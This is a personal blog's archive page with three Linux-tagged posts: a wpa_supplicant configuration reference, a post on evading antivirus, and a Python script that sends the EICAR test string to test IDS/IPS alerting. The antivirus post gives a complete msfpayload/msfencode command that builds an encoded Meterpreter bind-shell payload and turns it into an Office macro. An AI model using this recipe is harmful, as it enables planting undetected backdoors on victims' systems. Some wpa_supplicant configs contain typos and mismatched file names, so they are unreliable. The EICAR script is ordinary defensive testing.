______ Y ______

My own personal time capsule.

Tag Archives: linux

wpa_supplicant – quick reference

Leave a comment Posted by on June 9, 2013

wpa_supplicant is an amazing tool for linux that allows to connect to various WPA-enabled networks. Frankly speaking is so simple to use that it should take less than 30sec to configure provided that you know what config can be used for which network. Here is the list of tested configs:

Open Network

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
ssid="<your SSID>"
key_mgmt=NONE
priority=2
}

WPA Network

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1 
ssid="<your SSID>"
proto=WPA
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP WEP104 WEP40
psk=<psk key> 
}

WPA2 Network

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=WPA2
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP
psk="<psk key>
}

EAP-PEAP

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=RSN
key_mgmt=WPA-EAP
pairwise=CCMP
wpa=group=CCMP
eap=PEAP
priority=2
eapol_flags=0
identity="<username>"
password="<password>"
}

Cisco LEAP

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=WPA
key_mgmt=WPA-EAP
pairwise=TKIP
eap=LEAP
priority=2
auth_alg=LEAP
eapol_flags=0
identity="<username>"
password="<password>"
}

EAP-TTLS

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=RSN
key_mgmt=IEEE8021X
wpa-phase2=PAP # [Can also be: CHAP, MSCHAP, MSCHAPV2]
eap=TTLS
identity="<username>"
password="<password>"
}

EAP-TLS

step 1)
openssl pkcs12 -in <your_network_certificate>.pfx -out ca.pem -cacerts -nokeys
openssl pkcs12 -in <your_network_certificate>.pfx -out user.pem -clcerts
step 2) wpa_supplicant config: 
ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
      ssid="<your SSID>"
      scan_ssid=1
      key_mgmt=WPA-EAP
      pairwise=CCMP TKIP
      group=CCMP TKIP
      eap=TLS
      identity="username"
      ca_cert="cert.pem"
      client_cert="ca.pem"
      private_key="user.pem"
      private_key_passwd="1234"
}

How do we even use wpa_supplicant? Simply follow these steps:

Step 1) download and install it (source here)
Step 2) save one of the above configs to a file – e.g. ‘/etc/wpa_supplicant_LEAP.conf’
Step 3) if the network is PSK based use wpa_passphase to generate it & copy into the config – note the ‘psk key’ markers in the configs above where the PSK should be
Step 4) run wpa_supplicant as follows:

wpa_supplicant -c <path_to_your_config_file> -i <your interface>

Alternatively run above command with -dd for extra debugging output.

api, linux, wireless , , ,

Avoiding Anti-Virus with msfencode and Office

Leave a comment Posted by on August 25, 2012

Quite simple actually, provided that we know how to use msfencode templates (-x option) to work with the payload. This can be done in few simple steps:

1) Generate payload
2) Pipe it to msfencode with -x option ( use i.e. psexec.exe as template )
3) Use to create vbs script with binary representation of the code
4) Paste the output to the macro in Word, Excel or anything else from Office suite
5) Run “ShellcodeExecute” macro from inside of Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs

And finally copy & paste ‘BIND_4999.vbs’ content into MSWord document as macro. Now upload it to crate a listener shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted by i.e. firewall or its a DMZ.

anty-virus, api, linux, metasploit, ms, msfencode, python, windows , , , ,

IDS/IPS Testing with EICAR

Leave a comment Posted by on January 26, 2012

Following script will attempt to submit common malware string EICAR on multiple ports for IDS/IPS system to alert on in. It can be used to test how well does IDS pick up various malware that can be seen on the wire. 

# IMPORTS
import socket
import httplib,urllib
import ftplib
import telnetlib

# the eicar string to test with
EICAR = "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" 
############# CONFIGURATION #############
IP = "127.0.0.1"
############# END OF CONF #############


def info():
    print "[+] Multi-Protocol EICAR tester by Y"
    print "[+] contact : If you know me then give me a shout"
    print "[+] Supports - HTTP, FTP, TELNET, SSL , TCP , UDP , DNS"
    print "[+] NOTE: Set NC listener on specific ports between the hosts and DIS and watch IDS alerting on protocols"
    print "[+] Following ports are used: 21(TCP),23(TCP),25(TCP),100(UDP),80(TCP),22(TCP),443(TCP),53(UDP)"

def sendHTTP(data,target,port):
    try:
        print "[+] Sending HTTP request"
        conn = httplib.HTTPConnection(target,port)
        try:
            print "\t HEAD"
            conn.request("HEAD",EICAR)
        except:
            pass
        try:
            print "\t GET"
            conn.request("GET",EICAR)
        except:
            pass
        try:
            print "\t POST"
            params = urllib.urlencode({'eicar': EICAR})
            headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
            conn.request("POST", "", params, headers)
        except:
            pass
        try:
            print "\t PUT"
            conn.request("PUT",EICAR)
        except:
            pass
        try:
            print "\t DELETE"
            conn.request("DELETE",EICAR)
        except:
            pass
    except Exception,e:
        print "[-] Unable to send HTTP data due to : ",e
        pass
    
def sendFTP(data,target,port):
    try:
        print "[+] Sending FTP request"
        ftp = ftplib.FTP()
        ftp.connect(target, port)
        ftp.putline(data) # send single EICAR request
        ftp.close()
    except Exception,e:
        print "[-] Unable to send FTP data due to : ",e
        pass
def sendTelnet(data,target,port):
    try:
        print "[+] Sending TELNET request"
        tn = telnetlib.Telnet(target,port)
        tn.write(EICAR)
        tn.close()
    except Exception,e:
        print "[-] Unable to send TELNET data due to : ",e
        pass

def sendSMTP(data,target,port):
    try:
        print "[+] Sending SMTP request"
        tn = telnetlib.Telnet(target,port)
        tn.write("HELO localhost")
        tn.write("MAIL FROM: root@localhost")
        tn.write("RCPT TO: root@localhost")
        tn.write("DATA \n")
        tn.write(EICAR)
        tn.write("\n\t\n\t")
        tn.write("QUIT")
        tn.close()     
    except Exception,e:
        print "[-] Unable to send SMTP data due to : ",e
        pass
    
def sendSSH(data,targer,port):
    pass

def sendSSL(data,target,port):
    try:
        print "[+] Sending HTTP request"
        conn = httplib.HTTPSConnection(target,port)
        try:
            print "\t HEAD"
            conn.request("HEAD",EICAR)
        except:
            pass
        try:
            print "\t GET"
            conn.request("GET",EICAR)
        except:
            pass
        try:
            print "\t POST"
            params = urllib.urlencode({'eicar': EICAR})
            headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
            conn.request("POST", "", params, headers)
        except:
            pass
        try:
            print "\t PUT"
            conn.request("PUT",EICAR)
        except:
            pass
        try:
            print "\t DELETE"
            conn.request("DELETE",EICAR)
        except:
            pass
    except Exception,e:
        print "[-] Unable to send HTTP data due to : ",e
        pass
    
def sendICMP(data,target):
    pass

def sendRCP(data,target,port):       
    pass

def sendTCP(data,target,port):
    try:
        print "[+] Sending TCP data "
        socket.setdefaulttimeout(4)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, int(port)))
        s.send(data)
        s.close()
    except Exception,e:
        print "[-] Unable to send TCP data due to : ",e
        pass

def sendUDP(data,target,port):
    try:
        print "[+] Sending UDP data "
        sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) 
        sock.sendto( data, (target, port))
    except Exception,e:
        print "[-] Unable to send UDP data due to : ",e
        pass

def sendNETBIOS(data,target,port):
    pass

def sendDNS(data,target,port):
    try:
        print "[+] Sending DNS request "
        sendUDP(data, target, port) # dirty trick
    except Exception,e:
        print "[-] Unable to send DNS data due to : ",e
        pass


def end():
    print "Done, now review IDS logs for each protocol"

def start_test():
    info()

    sendFTP(EICAR, IP, 21)
    sendTelnet(EICAR, IP, 23)
    sendSMTP(EICAR, IP, 25)
    sendUDP(EICAR,IP, 100)
    sendHTTP(EICAR, IP, 80)
    sendTCP(EICAR, IP, 22)
    sendSSL(EICAR, IP, 443)
    sendDNS(EICAR,IP,53)
    
    #TODO:
    #Protocol play ( these are HPING2 wrappers )
    #sendICMP(EICAR,'192.168.2.79')
    #sendRCP(EICAR, '192.168.2.79', 445)
    #sendNETBIOS(EICAR, '192.168.2.79', 139)
    #sendSSH(EICAR, '192.168.2.79', 22)
    sendDNS(EICAR,IP,53)
    
    
    end()
    
# start_test the test    
start_test()
ids/ips, python, testing , , , ,